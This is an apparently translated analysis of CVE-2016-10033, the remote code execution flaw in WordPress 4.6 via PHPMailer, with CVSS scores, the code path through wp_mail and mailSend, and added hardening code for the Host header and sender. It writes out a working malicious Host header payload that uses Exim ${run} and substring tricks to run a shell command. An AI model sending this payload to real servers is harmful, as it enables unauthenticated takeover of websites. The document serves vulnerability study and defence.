9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
The remote code execution vulnerability in WordPress 4.6 is very serious: an unauthenticated attacker who exploits it can achieve remote code execution on the target server and gain immediate access, ultimately leading to a complete compromise of the application server. The vulnerability can be exploited without any plugins or non-standard settings. In his PoC, Dawid Golunski (@dawid_golunski) also shows a clever technique for substituting the `/` and space characters.
0x01 Vulnerability analysis
The whole chain relies on two weaknesses: WordPress does not validate the Host field of the request, and PHPMailer versions below 5.2.20 contain a code execution vulnerability. Used together, these two unsafe points result in remote code execution.
The PoC is published as: WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033
The command we tested with was
/usr/bin/touch /tmp/manning.test
Let us look at the request the PoC sends
![Request sent by the PoC](/Article/UploadPic/2017-5/20175615481996.png?www.myhack58.com)
The Host field is set as follows
Host: target(any-froot@localhost-be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}manning.test}} null)
This looks nothing like what we normally expect a Host header to be.
The rest of the flow is straightforward.
In wp-login.php, the request is first routed according to its action parameter
![Routing by action in wp-login.php](/Article/UploadPic/2017-5/20175615481809.png?www.myhack58.com)
and then enters the retrieve_password function
![retrieve_password](/Article/UploadPic/2017-5/20175615481557.png?www.myhack58.com)
which in turn calls the wp_mail function located in pluggable.php
![wp_mail in pluggable.php](/Article/UploadPic/2017-5/20175615481745.png?www.myhack58.com)
In wp_mail, WordPress concatenates the `$_SERVER['SERVER_NAME']` variable into the from_email variable.
![from_email built from SERVER_NAME](/Article/UploadPic/2017-5/20175615481353.png?www.myhack58.com)
After the message contents have been assembled, the member variables of the phpmailer object have all been set, and the Send function is called.
![Call to Send](/Article/UploadPic/2017-5/20175615481642.png?www.myhack58.com)
The most critical piece is the mailSend function, which is responsible for the final call. The key is the mailPassthru call, which passes the malicious $params variable (built from the attacker-controlled Sender) through to PHP's mail().

```php
protected function mailSend($header, $body)
{
    $toArr = array();
    foreach ($this->to as $toaddr) {
        $toArr[] = $this->addrFormat($toaddr);
    }
    $to = implode(', ', $toArr);
    // The Sender address becomes the "-f" envelope-sender argument for sendmail.
    // In this vulnerable version it is used without any shell-safety validation.
    if (empty($this->Sender)) {
        $params = ' ';
    } else {
        $params = sprintf('-f%s', $this->Sender);
    }
    if ($this->Sender != '' and !ini_get('safe_mode')) {
        $old_from = ini_get('sendmail_from');
        ini_set('sendmail_from', $this->Sender);
    }
    $result = false;
    if ($this->SingleTo && count($toArr) > 1) {
        foreach ($toArr as $toAddr) {
            // $params reaches mail()'s fifth argument here
            $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
            $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
        }
    } else {
        $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
        $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
    }
    if (isset($old_from)) {
        ini_set('sendmail_from', $old_from);
    }
    if (!$result) {
        throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
    }
    return true;
}
```
Debugging dynamically, the values of the variables at the moment mailPassthru is called are shown in the figure.
![Variables at the mailPassthru call](/Article/UploadPic/2017-5/20175615482840.png?www.myhack58.com)
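The two weak points described above, the unvalidated Host header and the Sender that is passed straight into the "-f" argument, can be closed independently. The following is an added example, not code from the article, WordPress or PHPMailer: it contrasts the vulnerable derivation of $params with a hardened version that forwards only a strictly validated sender, and adds a Host allowlist on the WordPress side. The function names, the allowlist and the sample headers are constructed for illustration.

```php
<?php
// Vulnerable flow as the article describes it: SERVER_NAME (taken from the Host
// header) is concatenated into from_email, which PHPMailer then turns into "-f<addr>".
function vulnerable_params(string $serverName): string
{
    $fromEmail = 'wordpress@' . $serverName;      // no validation of $serverName
    return sprintf('-f%s', $fromEmail);           // becomes mail()'s 5th argument
}

// Hardened: only a syntactically valid address made of characters that a shell
// can never interpret is allowed to reach the "-f" argument. Anything else yields
// no "-f" at all, so the MTA falls back to its default envelope sender.
function safe_params(string $sender): string
{
    $valid = filter_var($sender, FILTER_VALIDATE_EMAIL) !== false
        && preg_match('/\A[A-Za-z0-9@._+\-]+\z/', $sender) === 1;
    return $valid ? sprintf('-f%s', $sender) : '';
}

// WordPress side: never trust the Host header for building addresses; compare it
// (without any port suffix) against the hostnames the site is configured to serve.
function trusted_host(string $requestHost, array $allowedHosts): ?string
{
    $host = strtolower(preg_replace('/:\d+\z/', '', trim($requestHost)));
    return in_array($host, $allowedHosts, true) ? $host : null;
}

// Constructed sample inputs: a benign Host header and a shortened version of the
// malicious header shown in the article (the Exim ${run{...}} body is elided).
$samples = [
    'benign'    => 'blog.example.com',
    'malicious' => 'target(any-froot@localhost-be ${run{...}} null)',
];
$allowed = ['blog.example.com'];                  // constructed site allowlist

foreach ($samples as $label => $host) {
    $trusted = trusted_host($host, $allowed);
    printf("%-9s Host accepted: %s\n", $label, $trusted === null ? 'no' : 'yes');
    printf("%-9s vulnerable params: %s\n", $label, vulnerable_params($host));
    // Build the address only from a trusted host; otherwise fall back to a fixed sender.
    $sender = 'wordpress@' . ($trusted ?? 'localhost');
    printf("%-9s hardened params:   '%s'\n\n", $label, safe_params($sender));
}
```

For the malicious sample the hardened path produces no "-f" argument and the Host check fails, so nothing attacker-controlled reaches the sendmail command line; logging the rejected Host value at that point also gives a usable detection signal for this class of request.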